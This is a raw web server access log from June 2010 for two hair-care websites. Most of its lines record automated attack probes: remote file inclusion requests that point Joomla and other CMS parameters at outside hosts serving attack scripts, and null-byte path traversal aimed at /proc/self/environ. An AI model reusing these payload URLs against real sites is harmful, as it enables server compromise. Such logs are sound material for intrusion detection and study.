195.20.196.20 - - [27/Jun/2010:19:05:56 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:05:58 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:05:58 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:05:58 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:06:28 -0700] "GET /logs/access_100614.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:06:28 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:06:28 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:06:28 -0700] "GET /logs/access_100621.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
207.58.170.148 - - [27/Jun/2010:19:08:28 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:08:28 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:08:28 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:19:08:56 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 1572864 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
207.7.108.242 - - [27/Jun/2010:19:11:23 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
207.7.108.242 - - [27/Jun/2010:19:11:23 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
207.7.108.242 - - [27/Jun/2010:19:11:24 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:11:34 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:11:34 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:11:34 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:12:13 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:12:13 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:12:13 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:12:16 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:12:16 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.58.170.148 - - [27/Jun/2010:19:12:16 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "oi" "www.freehairsecrets.com"
207.7.108.242 - - [27/Jun/2010:19:17:05 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
207.7.108.242 - - [27/Jun/2010:19:17:05 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
207.7.108.242 - - [27/Jun/2010:19:17:05 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:19:17:20 -0700] "GET /logs/access_100208.log HTTP/1.1" 200 2097152 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:17:52 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:17:52 -0700] "GET /logs/access_100614.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:17:52 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:18:14 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:18:14 -0700] "GET /logs/access_100614.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:18:14 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
87.118.96.160 - - [27/Jun/2010:19:18:49 -0700] "GET /logs/access.log/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
87.118.96.160 - - [27/Jun/2010:19:18:49 -0700] "GET /index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
87.118.96.160 - - [27/Jun/2010:19:18:49 -0700] "GET /logs/index.php?option=com_alphauserpoints&view=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:19:19:00 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:19:19:00 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:19:19:00 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:19:19:00 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:19:19:00 -0700] "GET /logs/access_100510.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:19:19:00 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:19:19:06 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:19:19:06 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:19:19:06 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:19:19:07 -0700] "GET /logs//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:19:19:07 -0700] "GET /components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:19:19:07 -0700] "GET /logs/access.log%20%20//components/com_joomlalib/standalone/stubjambo.php?baseDir=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "www.freehairsecrets.com"
75.136.121.230 - - [27/Jun/2010:19:19:56 -0700] "GET /logs/access.log//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.136.121.230 - - [27/Jun/2010:19:19:56 -0700] "GET /modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
75.136.121.230 - - [27/Jun/2010:19:19:56 -0700] "GET /logs//modules/cjaycontent/admin/editor2/spaw_control.class.php?spaw_root=http://www.jinyoung-tsm.com/rgboard/data/idRFI.txt????? HTTP/1.1" 404 - "-" "libwww-perl/5.805" "growlonghairfast.com"
208.115.111.245 - - [27/Jun/2010:19:25:39 -0700] "GET /logs/access_100215.log HTTP/1.1" 200 1572864 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:28:04 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:28:04 -0700] "GET /logs/access_100621.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:28:21 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
62.44.82.118 - - [27/Jun/2010:19:29:25 -0700] "GET /logs/access.log/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.118 - - [27/Jun/2010:19:29:26 -0700] "GET /?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 926 "-" "libwww-perl/5.803" "www.freehairsecrets.com"
62.44.82.118 - - [27/Jun/2010:19:29:27 -0700] "GET /logs/?option=com_rokdownloads&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 200 6229 "-" "libwww-perl/5.803" "www.freehairsecrets.com"
174.129.228.67 - - [27/Jun/2010:19:31:32 -0700] "GET /robots.txt HTTP/1.0" 404 - "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.freehairsecrets.com"
174.129.228.67 - - [27/Jun/2010:19:31:32 -0700] "GET /logs/ HTTP/1.0" 200 6213 "-" "ia_archiver (+http://www.alexa.com/site/help/webmasters; crawler@alexa.com)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:19:33:49 -0700] "GET /logs/access_100118.log HTTP/1.1" 200 1274743 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
195.20.196.20 - - [27/Jun/2010:19:34:21 -0700] "GET /logs/access_100614.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:34:21 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:34:21 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:38:24 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:38:24 -0700] "GET /logs/access_100614.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
195.20.196.20 - - [27/Jun/2010:19:38:24 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "growlonghairfast.com"
208.115.111.245 - - [27/Jun/2010:19:50:42 -0700] "GET /logs/access_100125.log HTTP/1.1" 200 1137050 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
208.115.111.245 - - [27/Jun/2010:19:51:10 -0700] "GET /logs/access_100201.log HTTP/1.1" 200 2509489 "-" "Mozilla/5.0 (compatible; DotBot/1.1; http://www.dotnetdotcom.org/, crawler@dotnetdotcom.org)" "www.freehairsecrets.com"
83.161.235.24 - - [27/Jun/2010:19:52:33 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.freehairsecrets.com"
83.161.235.24 - - [27/Jun/2010:19:53:37 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
207.57.79.113 - - [27/Jun/2010:19:53:47 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
207.57.79.113 - - [27/Jun/2010:19:55:26 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
91.198.130.7 - - [27/Jun/2010:20:12:44 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:12:44 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:12:44 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:14:30 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:14:30 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:14:37 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:14:37 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:14:38 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:14:48 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
207.57.79.113 - - [27/Jun/2010:20:14:54 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
207.57.79.113 - - [27/Jun/2010:20:14:55 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
207.57.79.113 - - [27/Jun/2010:20:14:55 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "www.freehairsecrets.com"
207.57.79.113 - - [27/Jun/2010:20:19:02 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
207.57.79.113 - - [27/Jun/2010:20:19:03 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
207.57.79.113 - - [27/Jun/2010:20:19:03 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
207.57.79.113 - - [27/Jun/2010:20:21:13 -0700] "GET /logs/access_100621.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.825" "growlonghairfast.com"
67.195.37.176 - - [27/Jun/2010:20:30:11 -0700] "GET /freehairsecretsphp/viewtopic.php?p=10582 HTTP/1.0" 200 333 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
67.195.37.176 - - [27/Jun/2010:20:30:54 -0700] "GET /logs/?M=A HTTP/1.0" 200 6213 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
83.161.235.24 - - [27/Jun/2010:20:32:17 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.freehairsecrets.com"
83.161.235.24 - - [27/Jun/2010:20:32:17 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.freehairsecrets.com"
83.161.235.24 - - [27/Jun/2010:20:32:17 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:37:37 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:37:37 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:37:37 -0700] "GET /logs/access.log/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
209.126.254.119 - - [27/Jun/2010:20:44:12 -0700] "GET /delete_all.php?board_skin_path=http://forexforyou.org.ua/includes/js/dtree/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
209.126.254.119 - - [27/Jun/2010:20:44:12 -0700] "GET /logs//delete_all.php?board_skin_path=http://forexforyou.org.ua/includes/js/dtree/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
209.126.254.119 - - [27/Jun/2010:20:44:12 -0700] "GET /logs/access_100308.log//delete_all.php?board_skin_path=http://forexforyou.org.ua/includes/js/dtree/id2.txt?? HTTP/1.1" 404 - "-" "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.7.9) Gecko/20050711 Firefox/1.0.5" "growlonghairfast.com"
83.161.235.24 - - [27/Jun/2010:20:48:22 -0700] "GET /logs/access.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
83.161.235.24 - - [27/Jun/2010:20:48:22 -0700] "GET /pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
83.161.235.24 - - [27/Jun/2010:20:48:22 -0700] "GET /logs//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
83.161.235.24 - - [27/Jun/2010:20:48:46 -0700] "GET /logs/access_100621.log//pingserver.php HTTP/1.1" 404 - "-" "libwww-perl/5.836" "growlonghairfast.com"
91.212.226.112 - - [27/Jun/2010:20:49:31 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "growlonghairfast.com"
91.212.226.112 - - [27/Jun/2010:20:49:31 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 5.0; Windows 3.1)" "growlonghairfast.com"
91.198.130.7 - - [27/Jun/2010:20:49:40 -0700] "GET /index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:49:40 -0700] "GET /logs/access.log%20%20/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
91.198.130.7 - - [27/Jun/2010:20:49:40 -0700] "GET /logs/index2.php?option=com_gcalendar&controller=http://www.grovecityinsider.com/casper/Ckrid1.txt?? HTTP/1.1" 404 - "-" "Casper Bot Search" "www.freehairsecrets.com"
67.195.37.176 - - [27/Jun/2010:20:52:37 -0700] "GET /logs/access_100621.log HTTP/1.0" 200 4130305 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "growlonghairfast.com"
95.31.6.154 - - [27/Jun/2010:20:53:44 -0700] "GET /freehairsecretsphp/index.php HTTP/1.0" 200 333 "http://growlonghairfast.com/freehairsecretsphp/index.php" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "growlonghairfast.com"
95.31.6.154 - - [27/Jun/2010:20:53:44 -0700] "GET / HTTP/1.0" 200 910 "http://growlonghairfast.com/" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.0; Avant Browser [avantbrowser.com]; Hotbar 4.4.5.0)" "growlonghairfast.com"
82.194.70.248 - - [27/Jun/2010:20:53:50 -0700] "GET /index.php?option=com_gcalendar&controller=../../../../../../../../../../../../../../../proc/self/environ%00 HTTP/1.1" 404 - "-" "libwww-perl/5.831" "www.freehairsecrets.com"
68.168.223.135 - - [27/Jun/2010:20:54:59 -0700] "GET /logs/access_100614.log//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
68.168.223.135 - - [27/Jun/2010:20:54:59 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_cart.php?shop_this_skin_path=http://www.babywaves.com//a/pid?? HTTP/1.1" 404 - "-" "Mozilla/5.0" "growlonghairfast.com"
